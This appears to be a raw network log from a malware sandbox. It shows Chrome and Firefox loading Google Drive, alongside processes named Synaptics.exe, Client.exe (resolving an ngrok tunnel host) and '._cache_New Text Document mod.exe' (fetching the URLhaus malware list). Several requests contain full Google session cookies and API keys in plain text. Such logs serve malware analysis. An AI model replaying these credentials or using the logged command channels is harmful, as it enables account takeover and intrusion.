access-control-request-headers: authorization,x-goog-authuser,x-goog-drive-client-version,x-goog-ext-525001598-jspb
origin: https://drive.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
OPTIONS

https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

chrome.exe

Remote address:

216.58.201.106:443

Request

OPTIONS /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/2.0
host: ogads-pa.clients6.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-api-key,x-goog-authuser,x-user-agent
origin: https://drive.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
OPTIONS

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Create

chrome.exe

Remote address:

142.250.187.202:443

Request

OPTIONS /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
host: waa-pa.clients6.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-api-key,x-goog-authuser,x-user-agent
origin: https://drive.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
OPTIONS

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Ping

chrome.exe

Remote address:

142.250.187.202:443

Request

OPTIONS /$rpc/google.internal.waa.v1.Waa/Ping HTTP/2.0
host: waa-pa.clients6.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-api-key,x-goog-authuser,x-user-agent
origin: https://drive.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

drivefrontend-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drivefrontend-pa.clients6.google.com

IN A

Response

drivefrontend-pa.clients6.google.com

IN A

216.58.204.74
DNS

people-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

people-pa.clients6.google.com

IN A

Response

people-pa.clients6.google.com

IN A

142.250.200.10
DNS

appsgrowthpromo-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

appsgrowthpromo-pa.clients6.google.com

IN A

Response

appsgrowthpromo-pa.clients6.google.com

IN A

142.250.187.234
DNS

addons-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

addons-pa.clients6.google.com

IN A

Response

addons-pa.clients6.google.com

IN A

216.58.204.74
DNS

addons-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

addons-pa.clients6.google.com

IN A

Response

addons-pa.clients6.google.com

IN A

142.250.179.234
OPTIONS

https://appsgrowthpromo-pa.clients6.google.com/v1/promotion/FetchRecommendation?key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8&alt=protojson

chrome.exe

Remote address:

142.250.187.234:443

Request

OPTIONS /v1/promotion/FetchRecommendation?key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8&alt=protojson HTTP/2.0
host: appsgrowthpromo-pa.clients6.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-clientdetails,x-goog-authuser,x-goog-encode-response-if-executable,x-javascript-user-agent,x-requested-with
origin: https://drive.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

youtube.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.googleapis.com

IN A

Response

youtube.googleapis.com

IN A

142.250.200.42

youtube.googleapis.com

IN A

216.58.212.234

youtube.googleapis.com

IN A

142.250.178.10

youtube.googleapis.com

IN A

216.58.213.10

youtube.googleapis.com

IN A

142.250.179.234

youtube.googleapis.com

IN A

142.250.187.202

youtube.googleapis.com

IN A

172.217.169.74

youtube.googleapis.com

IN A

216.58.212.202

youtube.googleapis.com

IN A

142.250.187.234

youtube.googleapis.com

IN A

172.217.169.42

youtube.googleapis.com

IN A

142.250.200.10

youtube.googleapis.com

IN A

172.217.16.234

youtube.googleapis.com

IN A

216.58.201.106

youtube.googleapis.com

IN A

216.58.204.74

youtube.googleapis.com

IN A

142.250.180.10
DNS

youtube.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.googleapis.com

IN A

Response

youtube.googleapis.com

IN A

142.250.187.202

youtube.googleapis.com

IN A

172.217.16.234

youtube.googleapis.com

IN A

142.250.200.42

youtube.googleapis.com

IN A

142.250.187.234

youtube.googleapis.com

IN A

142.250.179.234

youtube.googleapis.com

IN A

216.58.212.202

youtube.googleapis.com

IN A

216.58.213.10

youtube.googleapis.com

IN A

172.217.169.10

youtube.googleapis.com

IN A

172.217.169.42

youtube.googleapis.com

IN A

142.250.180.10

youtube.googleapis.com

IN A

216.58.201.106

youtube.googleapis.com

IN A

172.217.169.74

youtube.googleapis.com

IN A

216.58.204.74

youtube.googleapis.com

IN A

142.250.200.10

youtube.googleapis.com

IN A

216.58.212.234

youtube.googleapis.com

IN A

142.250.178.10
DNS

docs.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

docs.google.com

IN A

Response

docs.google.com

IN A

142.250.179.238
DNS

contacts.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

contacts.google.com

IN A

Response

contacts.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.178.14
DNS

contacts.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

contacts.google.com

IN A

Response

contacts.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.178.14
GET

https://docs.google.com/offline/iframeapi?ouid=ubc4833a351b819&sa=9

chrome.exe

Remote address:

142.250.179.238:443

Request

GET /offline/iframeapi?ouid=ubc4833a351b819&sa=9 HTTP/2.0
host: docs.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x-client-data: CJ/1ygE=
sec-fetch-site: same-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: SSID=AQ4ySoJv7rKL3xBzT
cookie: __Secure-1PSID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKpPdAR-6pXNGU8_8b3ghl4gACgYKAQcSARQSFQHGX2MiuzFwzoGVZjf9XiL_gv-yGBoVAUF8yKpXe45Ghwkqa8cshj6z4NA90076
cookie: __Secure-3PSID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKjZzboFCsHoQqO6iUSQTb5QACgYKAc0SARQSFQHGX2MifVN2I4xFE0lp3BrkZ53u0hoVAUF8yKprMUakDM16Jcy0IiXUuTID0076
cookie: HSID=AbQk1Uh8DGBGRT8zI
cookie: SID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKh52HeyfeZmX7z4rNvRmNRgACgYKAQMSARQSFQHGX2MivN7-_rR5SYuFBuS5X1TOLxoVAUF8yKpmCLTsnkUgVLOwvkjiKMtj0076
cookie: APISID=LOPQUe7mvd0koWrH/AJWZLZntk8bZ1mG8T
cookie: SAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: __Secure-1PAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: __Secure-3PAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: NID=520=UMTlyC0IQYjviE7RuSacYLbIFp4Tw6mmHTl1vwit0u772LgiP5oB5w7tNME2ir9q6M2D44za9DXaSRyXRvgJ9fzvFo-yn037_-_dHCiMnfZ7iTaNKxfNZm84gAnegQjeOdWXWbSk9kKL4xGjQDllYXuxR_g_PyOOxTMYhSK7h3C7atdIsCv1NRH_af-0oQ0StpEXSCLPa25hjEgI6veClFyDqviyKI3Emhj5oqpxn9RbO4QLkxUwbVNGEQEXjRMMyEJ09zb2jMGFsuDDpbP6k6-UDQN7-4jPqWdXQYeAK5s5rOdFii58IIizghRI0HTeRcBZ4SIPJMo9yEpwJdnLLSpT-cw30t2nOw3H04qp9YAHkYtn4o3ZxbidS6CiGTrG0ckDRBUT4NnZ7ZShhHKP-c7qmhVD70Z1iaHZN0FBmG2BOQoIIgfhjA7nNz9IUYhtQNsraTEjWo3BkE6ISHybgatM1jmHyM6gi98FQ3TjjxKdBF09fqoMxxcxNBcYcDrpE0NTYsIwFag7jyEWroTnCfjkJl7bF2qkuBN1d2Xwe8uVZyylyh-d5CCPwzig7_7VuiAlZbUTwMNdCI5vtomY_LJ1_nxu9vglmpbfeCYTDzyKJCrCUyLuwO900dFR330ewy-iJTgPnxnjfo_tZ2yVmO7rsPk9y6nKWvWsYEa6503WYD31RhjCvkEM9A
cookie: __Secure-ENID=25.SE=LsEITiPdGX5W9fpVvAkjpt031NjHsSGM4vdGo0nuOfdBnPVeolcJJy7wZD8pqG7K3brj9x-0DiwTYLXjO62L44pZLO7rWDqkDoIxDSDmG2WzkTGjL5HrErlnkuKhbypF3cO9J7mKc831utoCgeLpIpj09Si30eKUH-q90VzuZBCypECWGnbVRSxfbVVTAYn7REHoBN42pRb_U_vfWTfAmZ6niw
cookie: __Secure-1PSIDTS=sidts-CjIBmiPuTUCZlUa5QtLx4Vvf_2_W2oPGgwxVj9jCul0sLm44cPPMxQHFpA_na6bxVGeC_xAA
cookie: __Secure-3PSIDTS=sidts-CjIBmiPuTUCZlUa5QtLx4Vvf_2_W2oPGgwxVj9jCul0sLm44cPPMxQHFpA_na6bxVGeC_xAA
cookie: SIDCC=AKEyXzUzBYsd0PXL-yOv7kTVuiAQEk0ViaMBVcr1mhlNpIX3DMBwJMc3pLAb9Yuvlv70KctC9A
cookie: __Secure-1PSIDCC=AKEyXzW_Z6O6Fhec8iZpgwpatdhRNb9h3S3GVyvbazqU1udE7CwX34lg4gvyNrAfOadgEWQ-
cookie: __Secure-3PSIDCC=AKEyXzXkbUX82J9dGfEKQUz1UbXoVmsVmj6VeVOvBSmXq2oC1gFQOwzfVplnxFPOVVeELGoJ6A
DNS

ogs.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogs.google.com

IN A

Response

ogs.google.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.178.14
DNS

ogs.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogs.google.com

IN A

Response

ogs.google.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.178.14
GET

https://contacts.google.com/widget/hovercard/v/2?origin=https%3A%2F%2Fdrive.google.com&usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.gapi.en.l2ZUC8FxqV8.O%2Fd%3D1%2Frs%3DAHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ%2Fm%3D__features__

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /widget/hovercard/v/2?origin=https%3A%2F%2Fdrive.google.com&usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.gapi.en.l2ZUC8FxqV8.O%2Fd%3D1%2Frs%3DAHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ%2Fm%3D__features__ HTTP/2.0
host: contacts.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x-client-data: CJ/1ygE=
sec-fetch-site: same-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: SSID=AQ4ySoJv7rKL3xBzT
cookie: __Secure-1PSID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKpPdAR-6pXNGU8_8b3ghl4gACgYKAQcSARQSFQHGX2MiuzFwzoGVZjf9XiL_gv-yGBoVAUF8yKpXe45Ghwkqa8cshj6z4NA90076
cookie: __Secure-3PSID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKjZzboFCsHoQqO6iUSQTb5QACgYKAc0SARQSFQHGX2MifVN2I4xFE0lp3BrkZ53u0hoVAUF8yKprMUakDM16Jcy0IiXUuTID0076
cookie: HSID=AbQk1Uh8DGBGRT8zI
cookie: SID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKh52HeyfeZmX7z4rNvRmNRgACgYKAQMSARQSFQHGX2MivN7-_rR5SYuFBuS5X1TOLxoVAUF8yKpmCLTsnkUgVLOwvkjiKMtj0076
cookie: APISID=LOPQUe7mvd0koWrH/AJWZLZntk8bZ1mG8T
cookie: SAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: __Secure-1PAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: __Secure-3PAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: NID=520=UMTlyC0IQYjviE7RuSacYLbIFp4Tw6mmHTl1vwit0u772LgiP5oB5w7tNME2ir9q6M2D44za9DXaSRyXRvgJ9fzvFo-yn037_-_dHCiMnfZ7iTaNKxfNZm84gAnegQjeOdWXWbSk9kKL4xGjQDllYXuxR_g_PyOOxTMYhSK7h3C7atdIsCv1NRH_af-0oQ0StpEXSCLPa25hjEgI6veClFyDqviyKI3Emhj5oqpxn9RbO4QLkxUwbVNGEQEXjRMMyEJ09zb2jMGFsuDDpbP6k6-UDQN7-4jPqWdXQYeAK5s5rOdFii58IIizghRI0HTeRcBZ4SIPJMo9yEpwJdnLLSpT-cw30t2nOw3H04qp9YAHkYtn4o3ZxbidS6CiGTrG0ckDRBUT4NnZ7ZShhHKP-c7qmhVD70Z1iaHZN0FBmG2BOQoIIgfhjA7nNz9IUYhtQNsraTEjWo3BkE6ISHybgatM1jmHyM6gi98FQ3TjjxKdBF09fqoMxxcxNBcYcDrpE0NTYsIwFag7jyEWroTnCfjkJl7bF2qkuBN1d2Xwe8uVZyylyh-d5CCPwzig7_7VuiAlZbUTwMNdCI5vtomY_LJ1_nxu9vglmpbfeCYTDzyKJCrCUyLuwO900dFR330ewy-iJTgPnxnjfo_tZ2yVmO7rsPk9y6nKWvWsYEa6503WYD31RhjCvkEM9A
cookie: __Secure-ENID=25.SE=LsEITiPdGX5W9fpVvAkjpt031NjHsSGM4vdGo0nuOfdBnPVeolcJJy7wZD8pqG7K3brj9x-0DiwTYLXjO62L44pZLO7rWDqkDoIxDSDmG2WzkTGjL5HrErlnkuKhbypF3cO9J7mKc831utoCgeLpIpj09Si30eKUH-q90VzuZBCypECWGnbVRSxfbVVTAYn7REHoBN42pRb_U_vfWTfAmZ6niw
cookie: __Secure-1PSIDTS=sidts-CjIBmiPuTUCZlUa5QtLx4Vvf_2_W2oPGgwxVj9jCul0sLm44cPPMxQHFpA_na6bxVGeC_xAA
cookie: __Secure-3PSIDTS=sidts-CjIBmiPuTUCZlUa5QtLx4Vvf_2_W2oPGgwxVj9jCul0sLm44cPPMxQHFpA_na6bxVGeC_xAA
cookie: SIDCC=AKEyXzUzBYsd0PXL-yOv7kTVuiAQEk0ViaMBVcr1mhlNpIX3DMBwJMc3pLAb9Yuvlv70KctC9A
cookie: __Secure-1PSIDCC=AKEyXzW_Z6O6Fhec8iZpgwpatdhRNb9h3S3GVyvbazqU1udE7CwX34lg4gvyNrAfOadgEWQ-
cookie: __Secure-3PSIDCC=AKEyXzXkbUX82J9dGfEKQUz1UbXoVmsVmj6VeVOvBSmXq2oC1gFQOwzfVplnxFPOVVeELGoJ6A
GET

https://ogs.google.com/u/0/widget/app?awwd=1&origin=https%3A%2F%2Fdrive.google.com&cn=app&pid=49&spid=49&hl=en

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /u/0/widget/app?awwd=1&origin=https%3A%2F%2Fdrive.google.com&cn=app&pid=49&spid=49&hl=en HTTP/2.0
host: ogs.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x-client-data: CJ/1ygE=
sec-fetch-site: same-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: SSID=AQ4ySoJv7rKL3xBzT
cookie: __Secure-1PSID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKpPdAR-6pXNGU8_8b3ghl4gACgYKAQcSARQSFQHGX2MiuzFwzoGVZjf9XiL_gv-yGBoVAUF8yKpXe45Ghwkqa8cshj6z4NA90076
cookie: __Secure-3PSID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKjZzboFCsHoQqO6iUSQTb5QACgYKAc0SARQSFQHGX2MifVN2I4xFE0lp3BrkZ53u0hoVAUF8yKprMUakDM16Jcy0IiXUuTID0076
cookie: HSID=AbQk1Uh8DGBGRT8zI
cookie: SID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKh52HeyfeZmX7z4rNvRmNRgACgYKAQMSARQSFQHGX2MivN7-_rR5SYuFBuS5X1TOLxoVAUF8yKpmCLTsnkUgVLOwvkjiKMtj0076
cookie: APISID=LOPQUe7mvd0koWrH/AJWZLZntk8bZ1mG8T
cookie: SAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: __Secure-1PAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: __Secure-3PAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: NID=520=UMTlyC0IQYjviE7RuSacYLbIFp4Tw6mmHTl1vwit0u772LgiP5oB5w7tNME2ir9q6M2D44za9DXaSRyXRvgJ9fzvFo-yn037_-_dHCiMnfZ7iTaNKxfNZm84gAnegQjeOdWXWbSk9kKL4xGjQDllYXuxR_g_PyOOxTMYhSK7h3C7atdIsCv1NRH_af-0oQ0StpEXSCLPa25hjEgI6veClFyDqviyKI3Emhj5oqpxn9RbO4QLkxUwbVNGEQEXjRMMyEJ09zb2jMGFsuDDpbP6k6-UDQN7-4jPqWdXQYeAK5s5rOdFii58IIizghRI0HTeRcBZ4SIPJMo9yEpwJdnLLSpT-cw30t2nOw3H04qp9YAHkYtn4o3ZxbidS6CiGTrG0ckDRBUT4NnZ7ZShhHKP-c7qmhVD70Z1iaHZN0FBmG2BOQoIIgfhjA7nNz9IUYhtQNsraTEjWo3BkE6ISHybgatM1jmHyM6gi98FQ3TjjxKdBF09fqoMxxcxNBcYcDrpE0NTYsIwFag7jyEWroTnCfjkJl7bF2qkuBN1d2Xwe8uVZyylyh-d5CCPwzig7_7VuiAlZbUTwMNdCI5vtomY_LJ1_nxu9vglmpbfeCYTDzyKJCrCUyLuwO900dFR330ewy-iJTgPnxnjfo_tZ2yVmO7rsPk9y6nKWvWsYEa6503WYD31RhjCvkEM9A
cookie: __Secure-ENID=25.SE=LsEITiPdGX5W9fpVvAkjpt031NjHsSGM4vdGo0nuOfdBnPVeolcJJy7wZD8pqG7K3brj9x-0DiwTYLXjO62L44pZLO7rWDqkDoIxDSDmG2WzkTGjL5HrErlnkuKhbypF3cO9J7mKc831utoCgeLpIpj09Si30eKUH-q90VzuZBCypECWGnbVRSxfbVVTAYn7REHoBN42pRb_U_vfWTfAmZ6niw
cookie: __Secure-1PSIDTS=sidts-CjIBmiPuTUCZlUa5QtLx4Vvf_2_W2oPGgwxVj9jCul0sLm44cPPMxQHFpA_na6bxVGeC_xAA
cookie: __Secure-3PSIDTS=sidts-CjIBmiPuTUCZlUa5QtLx4Vvf_2_W2oPGgwxVj9jCul0sLm44cPPMxQHFpA_na6bxVGeC_xAA
cookie: SIDCC=AKEyXzUzBYsd0PXL-yOv7kTVuiAQEk0ViaMBVcr1mhlNpIX3DMBwJMc3pLAb9Yuvlv70KctC9A
cookie: __Secure-1PSIDCC=AKEyXzW_Z6O6Fhec8iZpgwpatdhRNb9h3S3GVyvbazqU1udE7CwX34lg4gvyNrAfOadgEWQ-
cookie: __Secure-3PSIDCC=AKEyXzXkbUX82J9dGfEKQUz1UbXoVmsVmj6VeVOvBSmXq2oC1gFQOwzfVplnxFPOVVeELGoJ6A
DNS

signaler-pa.clients6.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

signaler-pa.clients6.google.com

IN A

Response

signaler-pa.clients6.google.com

IN A

142.250.178.10
DNS

signaler-pa.clients6.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

signaler-pa.clients6.google.com

IN A

Response

signaler-pa.clients6.google.com

IN A

142.250.178.10
OPTIONS

https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ

chrome.exe

Remote address:

142.250.178.10:443

Request

OPTIONS /punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ HTTP/2.0
host: signaler-pa.clients6.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-authuser
origin: https://drive.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

10.178.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

10.178.250.142.in-addr.arpa

IN PTR

Response

10.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f101e100net
DNS

10.178.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

10.178.250.142.in-addr.arpa

IN PTR

Response

10.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f101e100net
DNS

0.tcp.in.ngrok.io

Client.exe

Remote address:

8.8.8.8:53

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

3.108.97.190
DNS

0.tcp.in.ngrok.io

Client.exe

Remote address:

8.8.8.8:53

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

13.127.206.16
DNS

docs.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

docs.google.com

IN A

Response

docs.google.com

IN A

142.250.179.238
DNS

docs.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

docs.google.com

IN A

Response

docs.google.com

IN A

142.250.179.238
DNS

o.pki.goog

Synaptics.exe

Remote address:

8.8.8.8:53

Request

o.pki.goog

IN A

Response

o.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.178.3
DNS

o.pki.goog

Synaptics.exe

Remote address:

8.8.8.8:53

Request

o.pki.goog

IN A

Response

o.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.178.3
GET

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDREXAZkIcRFgn9FoWvtnQ0

Synaptics.exe

Remote address:

142.250.178.3:80

Request

GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDREXAZkIcRFgn9FoWvtnQ0 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Mon, 13 Jan 2025 17:15:57 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 2853
GET

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj

Synaptics.exe

Remote address:

142.250.178.3:80

Request

GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Mon, 13 Jan 2025 17:29:27 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 2044
DNS

drive.usercontent.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

drive.usercontent.google.com

IN A

Response

drive.usercontent.google.com

IN A

216.58.212.193
DNS

drive.usercontent.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

drive.usercontent.google.com

IN A

Response

drive.usercontent.google.com

IN A

216.58.212.193
DNS

193.212.58.216.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

193.212.58.216.in-addr.arpa

IN PTR

Response

193.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f1931e100net

193.212.58.216.in-addr.arpa

IN PTR

lhr25s27-in-f1�J

193.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f1�J
DNS

193.212.58.216.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

193.212.58.216.in-addr.arpa

IN PTR

Response

193.212.58.216.in-addr.arpa

IN PTR

lhr25s27-in-f11e100net

193.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f1�H

193.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f193�H
DNS

21.236.111.52.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

21.236.111.52.in-addr.arpa

IN PTR

Response
DNS

21.236.111.52.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

21.236.111.52.in-addr.arpa

IN PTR

Response
DNS

urlhaus.abuse.ch

._cache_New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.2.49

p2.shared.global.fastly.net

IN A

151.101.66.49

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.130.49
DNS

urlhaus.abuse.ch

._cache_New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.66.49

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.2.49
GET

https://urlhaus.abuse.ch/downloads/text_online/

._cache_New Text Document mod.exe

Remote address:

151.101.2.49:443

Request

